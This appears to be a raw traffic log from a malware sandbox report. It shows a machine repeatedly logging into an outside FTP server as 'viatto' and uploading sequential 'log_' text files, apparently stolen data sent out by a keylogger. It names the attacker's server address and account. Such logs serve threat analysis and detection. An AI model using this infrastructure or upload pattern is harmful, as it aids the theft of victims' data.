                                                                                                                                    Oct 10, 2022 06:02:56.103251934 CEST2149855185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:02:56.294404984 CEST2149857185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:02:56.294495106 CEST2149857185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:02:56.294991970 CEST2149857185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:02:56.295188904 CEST4985721192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:02:56.317660093 CEST2149857185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:02:56.317969084 CEST4985721192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:02:56.341110945 CEST2149857185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:02:56.341396093 CEST4985721192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:02:56.364039898 CEST2149857185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:02:56.364304066 CEST4985721192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:02:56.387290001 CEST2149857185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:02:56.388118982 CEST4985721192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:02:56.410604000 CEST2149857185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:02:56.411843061 CEST4985721192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:02:56.434767008 CEST2149857185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,89)
                                                                                                                                    Oct 10, 2022 06:02:56.459110022 CEST4985721192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_07.18.txt
                                                                                                                                    Oct 10, 2022 06:02:56.482399940 CEST2149857185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:02:56.506720066 CEST2149857185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:02:56.703469992 CEST2149859185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:02:56.703542948 CEST2149859185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:02:56.703576088 CEST2149859185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:02:56.704955101 CEST4985921192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:02:56.727722883 CEST2149859185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:02:56.727978945 CEST4985921192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:02:56.750894070 CEST2149859185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:02:56.751211882 CEST4985921192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:02:56.774190903 CEST2149859185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:02:56.774935961 CEST4985921192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:02:56.797852993 CEST2149859185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:02:56.798540115 CEST4985921192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:02:56.821398973 CEST2149859185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:02:56.823256016 CEST4985921192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:02:56.846549034 CEST2149859185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,90)
                                                                                                                                    Oct 10, 2022 06:02:56.870110989 CEST4985921192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_07.19.txt
                                                                                                                                    Oct 10, 2022 06:02:56.893452883 CEST2149859185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:02:56.920115948 CEST2149859185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:02:57.111726999 CEST2149861185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:02:57.111778975 CEST2149861185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:02:57.111812115 CEST2149861185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:02:57.112091064 CEST4986121192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:02:57.137326002 CEST2149861185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:02:57.137670994 CEST4986121192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:02:57.161978960 CEST2149861185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:02:57.162302971 CEST4986121192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:02:57.187696934 CEST2149861185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:02:57.188211918 CEST4986121192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:02:57.214741945 CEST2149861185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:02:57.215651989 CEST4986121192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:02:57.240606070 CEST2149861185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:02:57.241755962 CEST4986121192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:02:57.267173052 CEST2149861185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,91)
                                                                                                                                    Oct 10, 2022 06:02:57.293426991 CEST4986121192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_07.20.txt
                                                                                                                                    Oct 10, 2022 06:02:57.318372965 CEST2149861185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:02:57.345024109 CEST2149861185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:02:57.555188894 CEST2149863185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:02:57.555217028 CEST2149863185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:02:57.555229902 CEST2149863185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:02:57.555572033 CEST4986321192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:02:57.580475092 CEST2149863185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:02:57.580760956 CEST4986321192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:02:57.605945110 CEST2149863185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:02:57.606211901 CEST4986321192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:02:57.630089998 CEST2149863185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:02:57.634424925 CEST4986321192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:02:57.660248041 CEST2149863185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:02:57.665146112 CEST4986321192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:02:57.689852953 CEST2149863185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:02:57.692255974 CEST4986321192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:02:57.717794895 CEST2149863185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,93)
                                                                                                                                    Oct 10, 2022 06:02:57.745019913 CEST4986321192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_07.21.txt
                                                                                                                                    Oct 10, 2022 06:02:57.770200968 CEST2149863185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:02:57.800895929 CEST2149863185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:02:58.029794931 CEST2149865185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:02:58.029844999 CEST2149865185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:02:58.029869080 CEST2149865185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:02:58.030273914 CEST4986521192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:02:58.053498030 CEST2149865185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:02:58.057570934 CEST4986521192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:02:58.081146002 CEST2149865185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:02:58.081790924 CEST4986521192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:02:58.105508089 CEST2149865185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:02:58.105854034 CEST4986521192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:02:58.129446030 CEST2149865185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:02:58.134462118 CEST4986521192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:02:58.157540083 CEST2149865185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:02:58.158708096 CEST4986521192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:02:58.182291985 CEST2149865185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,94)
                                                                                                                                    Oct 10, 2022 06:02:58.209508896 CEST4986521192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_07.22.txt
                                                                                                                                    Oct 10, 2022 06:02:58.233377934 CEST2149865185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:02:58.263531923 CEST2149865185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:02:58.472251892 CEST2149867185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:02:58.472305059 CEST2149867185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:02:58.472341061 CEST2149867185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:02:58.472610950 CEST4986721192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:02:58.498537064 CEST2149867185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:02:58.502672911 CEST4986721192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:02:58.531125069 CEST2149867185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:02:58.531421900 CEST4986721192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:02:58.558778048 CEST2149867185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:02:58.559621096 CEST4986721192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:02:58.588268042 CEST2149867185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:02:58.591434002 CEST4986721192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:02:58.619088888 CEST2149867185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:02:58.623374939 CEST4986721192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:02:58.651138067 CEST2149867185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,95)
                                                                                                                                    Oct 10, 2022 06:02:58.679163933 CEST4986721192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_07.23.txt
                                                                                                                                    Oct 10, 2022 06:02:58.706285954 CEST2149867185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:02:58.737317085 CEST2149867185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:02:58.942009926 CEST2149869185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:02:58.942068100 CEST2149869185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:02:58.942100048 CEST2149869185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:02:58.942466021 CEST4986921192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:02:58.965567112 CEST2149869185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:02:58.970350027 CEST4986921192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:02:58.993938923 CEST2149869185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:02:58.994434118 CEST4986921192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:02:59.017533064 CEST2149869185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:02:59.017818928 CEST4986921192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:02:59.041584015 CEST2149869185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:02:59.042128086 CEST4986921192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:02:59.065479040 CEST2149869185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:02:59.074343920 CEST4986921192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:02:59.098316908 CEST2149869185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,96)
                                                                                                                                    Oct 10, 2022 06:02:59.129528999 CEST4986921192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_07.24.txt
                                                                                                                                    Oct 10, 2022 06:02:59.156347990 CEST2149869185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:02:59.185509920 CEST2149869185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:02:59.389720917 CEST2149871185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:02:59.389877081 CEST2149871185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:02:59.389947891 CEST2149871185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:02:59.390661955 CEST4987121192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:02:59.414158106 CEST2149871185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:02:59.414999008 CEST4987121192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:02:59.439179897 CEST2149871185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:02:59.439681053 CEST4987121192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:02:59.463957071 CEST2149871185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:02:59.464528084 CEST4987121192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:02:59.489412069 CEST2149871185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:02:59.495306015 CEST4987121192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:02:59.521760941 CEST2149871185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:02:59.530047894 CEST4987121192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:02:59.555392027 CEST2149871185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,97)
                                                                                                                                    Oct 10, 2022 06:02:59.586492062 CEST4987121192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_07.25.txt
                                                                                                                                    Oct 10, 2022 06:02:59.611733913 CEST2149871185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:02:59.637789965 CEST2149871185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:02:59.820923090 CEST2149873185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:02:59.820979118 CEST2149873185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:02:59.821011066 CEST2149873185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:02:59.821538925 CEST4987321192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:02:59.846941948 CEST2149873185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:02:59.862230062 CEST4987321192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:02:59.886800051 CEST2149873185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:02:59.888055086 CEST4987321192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:02:59.914458036 CEST2149873185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:02:59.914915085 CEST4987321192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:02:59.940543890 CEST2149873185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:02:59.941206932 CEST4987321192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:02:59.965950966 CEST2149873185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:02:59.967036009 CEST4987321192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:02:59.992604971 CEST2149873185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,98)
                                                                                                                                    Oct 10, 2022 06:03:00.016578913 CEST4987321192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_07.26.txt
                                                                                                                                    Oct 10, 2022 06:03:00.041733027 CEST2149873185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:03:00.066489935 CEST2149873185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:03:00.264400959 CEST2149875185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:03:00.264452934 CEST2149875185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:03:00.264486074 CEST2149875185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:03:00.271450043 CEST4987521192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:03:00.299679995 CEST2149875185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:03:00.299945116 CEST4987521192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:03:00.326267958 CEST2149875185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:03:00.328284979 CEST4987521192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:03:00.353367090 CEST2149875185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:03:00.356165886 CEST4987521192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:03:00.382436991 CEST2149875185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:03:00.383095980 CEST4987521192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:03:00.407864094 CEST2149875185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:03:00.408952951 CEST4987521192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:03:00.433331966 CEST2149875185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,99)
                                                                                                                                    Oct 10, 2022 06:03:00.458345890 CEST4987521192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_07.27.txt
                                                                                                                                    Oct 10, 2022 06:03:00.483310938 CEST2149875185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:03:00.514708042 CEST2149875185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:03:00.724951982 CEST2149877185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:03:00.724987984 CEST2149877185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:03:00.725315094 CEST2149877185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:03:00.725593090 CEST4987721192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:03:00.749320984 CEST2149877185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:03:00.749653101 CEST4987721192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:03:00.772233963 CEST2149877185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:03:00.772551060 CEST4987721192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:03:00.796354055 CEST2149877185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:03:00.799154997 CEST4987721192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:03:00.823374033 CEST2149877185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:03:00.823863983 CEST4987721192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:03:00.846393108 CEST2149877185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:03:00.847636938 CEST4987721192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:03:00.871021986 CEST2149877185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,101)
                                                                                                                                    Oct 10, 2022 06:03:00.895474911 CEST4987721192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_07.28.txt
                                                                                                                                    Oct 10, 2022 06:03:00.919116020 CEST2149877185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:03:00.951041937 CEST2149877185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:03:01.148844957 CEST2149879185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:03:01.149024963 CEST2149879185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:03:01.149132967 CEST2149879185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:03:01.149442911 CEST4987921192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:03:01.172913074 CEST2149879185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:03:01.174700022 CEST4987921192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:03:01.200871944 CEST2149879185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:03:01.202708006 CEST4987921192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:03:01.226016998 CEST2149879185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:03:01.226843119 CEST4987921192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:03:01.250375032 CEST2149879185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:03:01.254461050 CEST4987921192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:03:01.277734041 CEST2149879185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:03:01.278701067 CEST4987921192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:03:01.302212954 CEST2149879185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,102)
                                                                                                                                    Oct 10, 2022 06:03:01.327718973 CEST4987921192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_07.29.txt
                                                                                                                                    Oct 10, 2022 06:03:01.351701975 CEST2149879185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:03:01.386601925 CEST2149879185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:03:01.579935074 CEST2149881185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:03:01.580015898 CEST2149881185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:03:01.580161095 CEST2149881185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:03:01.580396891 CEST4988121192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:03:01.606020927 CEST2149881185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:03:01.606314898 CEST4988121192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:03:01.631767988 CEST2149881185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:03:01.632370949 CEST4988121192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:03:01.657109976 CEST2149881185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:03:01.662430048 CEST4988121192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:03:01.687216997 CEST2149881185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:03:01.691107035 CEST4988121192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:03:01.715555906 CEST2149881185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:03:01.716967106 CEST4988121192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:03:01.741854906 CEST2149881185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,103)
                                                                                                                                    Oct 10, 2022 06:03:01.766377926 CEST4988121192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_07.30.txt
                                                                                                                                    Oct 10, 2022 06:03:01.792345047 CEST2149881185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:03:01.820239067 CEST2149881185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:03:02.086280107 CEST2149883185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:03:02.086332083 CEST2149883185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:03:02.086743116 CEST2149883185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:03:02.086910963 CEST4988321192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:03:02.111196995 CEST2149883185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:03:02.114923000 CEST4988321192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:03:02.139286041 CEST2149883185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:03:02.142889977 CEST4988321192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:03:02.167009115 CEST2149883185.106.92.60192.168.2.3550 Directoryname not valid
